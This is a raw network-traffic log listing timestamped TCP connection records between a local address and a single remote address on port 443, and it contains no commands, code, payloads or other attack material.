                                      Jan 22, 2025 08:42:53.688772917 CET44356011104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:53.688827991 CET44356011104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:53.688962936 CET56011443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:53.689244032 CET56011443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:53.689261913 CET44356011104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:56.706046104 CET56034443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:56.706089973 CET44356034104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:56.706171989 CET56034443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:56.706461906 CET56034443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:56.706475973 CET44356034104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:56.816165924 CET56038443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:56.816191912 CET44356038104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:56.816256046 CET56038443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:56.816693068 CET56038443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:56.816704988 CET44356038104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:57.169982910 CET44356034104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:57.173089981 CET56034443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:57.173654079 CET56034443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:57.173665047 CET44356034104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:57.173914909 CET56034443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:57.173921108 CET44356034104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:57.301810026 CET44356038104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:57.305110931 CET56038443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:57.309539080 CET56038443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:57.309554100 CET44356038104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:57.310134888 CET56038443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:57.310142994 CET44356038104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:57.511668921 CET44356034104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:57.511713028 CET44356034104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:57.511769056 CET56034443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:57.511977911 CET56034443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:57.511996031 CET44356034104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:57.644421101 CET44356038104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:57.644498110 CET44356038104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:57.644598007 CET56038443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:57.644762993 CET56038443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:57.644783974 CET44356038104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:42:57.644823074 CET56038443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:42:57.644851923 CET56038443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:00.518670082 CET56061443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:00.518702030 CET44356061104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:00.519076109 CET56061443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:00.519301891 CET56061443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:00.519309998 CET44356061104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:00.973989010 CET44356061104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:00.974042892 CET56061443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:00.974793911 CET56061443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:00.974798918 CET44356061104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:00.975291967 CET56061443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:00.975295067 CET44356061104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:01.296413898 CET44356061104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:01.296469927 CET44356061104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:01.296500921 CET56061443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:01.296782017 CET56061443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:01.296782017 CET56061443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:01.611326933 CET56061443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:01.611351967 CET44356061104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:02.690251112 CET56077443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:02.690291882 CET44356077104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:02.690840960 CET56077443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:02.691170931 CET56077443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:02.691183090 CET44356077104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:03.146975040 CET44356077104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:03.147063971 CET56077443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:03.152805090 CET56077443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:03.152815104 CET44356077104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:03.153146982 CET56077443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:03.153155088 CET44356077104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:03.485786915 CET44356077104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:03.485856056 CET44356077104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:03.486525059 CET56077443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:03.491189957 CET56077443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:03.491209030 CET44356077104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:03.491228104 CET56077443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:03.491713047 CET56077443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:04.299655914 CET56088443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:04.299743891 CET44356088104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:04.299830914 CET56088443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:04.300084114 CET56088443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:04.300108910 CET44356088104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:04.774010897 CET44356088104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:04.777240038 CET56088443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:04.777565002 CET56088443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:04.777594090 CET44356088104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:04.777751923 CET56088443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:04.777765989 CET44356088104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:05.097242117 CET44356088104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:05.097294092 CET44356088104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:05.097426891 CET56088443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:05.097428083 CET56088443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:05.097769022 CET56088443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:05.097832918 CET44356088104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:08.112168074 CET56114443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:08.112262964 CET44356114104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:08.112343073 CET56114443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:08.112628937 CET56114443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:08.112658024 CET44356114104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:08.533999920 CET56119443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:08.534086943 CET44356119104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:08.534171104 CET56119443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:08.534408092 CET56119443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:08.534430027 CET44356119104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:08.594650984 CET44356114104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:08.594729900 CET56114443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:08.595004082 CET56114443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:08.595033884 CET44356114104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:08.595163107 CET56114443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:08.595175028 CET44356114104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:08.953269958 CET44356114104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:08.953320026 CET44356114104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:08.953329086 CET56114443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:08.953372002 CET56114443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:08.953579903 CET56114443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:08.953617096 CET44356114104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:08.992697954 CET44356119104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:08.992799044 CET56119443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:08.994853973 CET56119443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:08.994878054 CET44356119104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:08.995035887 CET56119443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:08.995049000 CET44356119104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:09.315757990 CET44356119104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:09.315829992 CET56119443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:09.315850019 CET44356119104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:09.315907955 CET56119443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:09.315911055 CET44356119104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:09.315953970 CET56119443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:09.316032887 CET56119443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:09.316061020 CET44356119104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:09.316085100 CET56119443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:09.316107035 CET56119443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:11.956366062 CET56141443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:11.956414938 CET44356141104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:11.956536055 CET56141443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:11.956823111 CET56141443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:11.956837893 CET44356141104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:12.518290043 CET44356141104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:12.518358946 CET56141443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:12.590384007 CET56141443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:12.590399981 CET44356141104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:12.590811968 CET56141443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:12.590816021 CET44356141104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:12.889889002 CET44356141104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:12.889950037 CET44356141104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:12.889959097 CET56141443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:12.889990091 CET56141443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:12.910579920 CET56141443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:12.910597086 CET44356141104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:14.346903086 CET56157443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:14.346995115 CET44356157104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:14.347090960 CET56157443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:14.347359896 CET56157443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:14.347398043 CET44356157104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:14.824938059 CET44356157104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:14.825129032 CET56157443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:14.825614929 CET56157443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:14.825670004 CET44356157104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:14.825973034 CET56157443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:14.826029062 CET44356157104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:15.340116024 CET44356157104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:15.340190887 CET44356157104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:15.340388060 CET56157443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:15.340388060 CET56157443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:15.340476990 CET56157443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:15.340477943 CET56157443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:15.340517998 CET44356157104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:15.340924978 CET56157443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:15.925955057 CET56168443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:15.926044941 CET44356168104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:15.926150084 CET56168443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:15.926418066 CET56168443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:15.926460028 CET44356168104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:16.388550043 CET44356168104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:16.388727903 CET56168443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:16.389329910 CET56168443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:16.389384985 CET44356168104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:16.389508009 CET56168443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:16.389535904 CET44356168104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:16.717328072 CET44356168104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:16.717376947 CET44356168104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:16.717545033 CET56168443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:16.717972994 CET56168443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:16.717972994 CET56168443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:17.037259102 CET56168443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:17.037323952 CET44356168104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:19.723155022 CET56193443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:19.723242044 CET44356193104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:19.723362923 CET56193443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:19.724116087 CET56193443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:19.724200010 CET44356193104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:20.184350014 CET44356193104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:20.184640884 CET56193443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:20.202409029 CET56193443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:20.202496052 CET44356193104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:20.202569008 CET56193443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:20.202584982 CET44356193104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:20.346803904 CET56194443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:20.346904993 CET44356194104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:20.347249985 CET56194443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:20.347558022 CET56194443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:20.347596884 CET44356194104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:20.512298107 CET44356193104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:20.512456894 CET44356193104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:20.512692928 CET56193443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:20.512814045 CET56193443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:20.512856007 CET44356193104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:20.813088894 CET44356194104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:20.813281059 CET56194443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:20.813663960 CET56194443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:20.813695908 CET44356194104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:20.813838959 CET56194443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:20.813852072 CET44356194104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:21.143564939 CET44356194104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:21.143656969 CET44356194104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:21.143676043 CET56194443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:21.143752098 CET56194443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:21.143888950 CET56194443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:21.143935919 CET44356194104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:21.143960953 CET56194443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:21.144433975 CET56194443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:23.518865108 CET56195443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:23.518918037 CET44356195104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:23.519196987 CET56195443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:23.519438982 CET56195443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:23.519479036 CET44356195104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:24.006804943 CET44356195104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:24.006984949 CET56195443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:24.007631063 CET56195443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:24.007694006 CET44356195104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:24.007749081 CET56195443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:24.007762909 CET44356195104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:24.346323013 CET44356195104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:24.346457005 CET44356195104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:24.346523046 CET56195443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:24.346523046 CET56195443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:24.346671104 CET56195443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:24.346690893 CET44356195104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:26.175081968 CET56196443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:26.175177097 CET44356196104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:26.175270081 CET56196443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:26.175756931 CET56196443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:26.175837994 CET44356196104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:26.653759956 CET44356196104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:26.653856039 CET56196443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:26.654369116 CET56196443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:26.654397011 CET44356196104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:26.654664040 CET56196443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:26.654676914 CET44356196104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:26.973100901 CET44356196104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:26.973203897 CET56196443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:26.973268032 CET44356196104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:26.973304987 CET44356196104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:26.973373890 CET56196443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:26.973521948 CET56196443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:26.973560095 CET44356196104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:26.973587990 CET56196443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:26.973611116 CET56196443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:27.362377882 CET56197443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:27.362495899 CET44356197104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:27.362632036 CET56197443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:27.362972975 CET56197443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:27.363008022 CET44356197104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:27.840900898 CET44356197104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:27.840979099 CET56197443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:27.841440916 CET56197443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:27.841464996 CET44356197104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:27.841620922 CET56197443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:27.841633081 CET44356197104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:28.148739100 CET44356197104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:28.148871899 CET56197443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:28.148912907 CET44356197104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:28.148962021 CET44356197104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:28.149032116 CET56197443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:28.149156094 CET56197443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:28.149183035 CET44356197104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:31.159523010 CET56198443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:31.159615040 CET44356198104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:31.159881115 CET56198443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:31.160062075 CET56198443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:31.160094976 CET44356198104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:31.650064945 CET44356198104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:31.650484085 CET56198443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:31.650881052 CET56198443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:31.650943041 CET44356198104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:31.651001930 CET56198443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:31.651015997 CET44356198104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:31.975275993 CET44356198104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:31.975368977 CET44356198104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:31.975466967 CET56198443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:31.975466967 CET56198443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:31.975919962 CET56198443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:31.975987911 CET44356198104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:31.987346888 CET56199443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:31.987436056 CET44356199104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:31.987535954 CET56199443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:31.987884045 CET56199443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:31.987917900 CET44356199104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:32.451709032 CET44356199104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:32.451780081 CET56199443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:32.452280045 CET56199443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:32.452290058 CET44356199104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:32.452461958 CET56199443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:32.452469110 CET44356199104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:32.795605898 CET44356199104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:32.795783043 CET44356199104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:32.795880079 CET56199443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:32.811988115 CET56199443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:32.812015057 CET44356199104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:32.812055111 CET56199443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:32.812082052 CET56199443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:34.987310886 CET56200443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:34.987356901 CET44356200104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:34.987652063 CET56200443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:34.987901926 CET56200443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:34.987914085 CET44356200104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:36.048573017 CET44356200104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:36.048774004 CET56200443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:36.049365044 CET56200443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:36.049375057 CET44356200104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:36.049578905 CET56200443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:36.049585104 CET44356200104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:36.352124929 CET44356200104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:36.352185011 CET44356200104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:36.352191925 CET56200443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:36.352237940 CET56200443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:36.352509022 CET56200443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:36.352529049 CET44356200104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:37.909392118 CET56201443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:37.909487009 CET44356201104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:37.909786940 CET56201443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:37.910037994 CET56201443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:37.910079956 CET44356201104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:38.365950108 CET44356201104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:38.367433071 CET56201443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:38.372579098 CET56201443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:38.372594118 CET44356201104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:38.372874022 CET56201443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:38.372879982 CET44356201104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:38.699889898 CET44356201104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:38.699955940 CET44356201104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:38.699976921 CET56201443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:38.700067997 CET56201443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:38.702776909 CET56201443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:38.702778101 CET56201443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:38.702847004 CET44356201104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:38.702930927 CET56201443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:39.363430023 CET56202443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:43:39.363473892 CET44356202104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:43:39.363535881 CET56202443192.168.2.4104.21.48.1
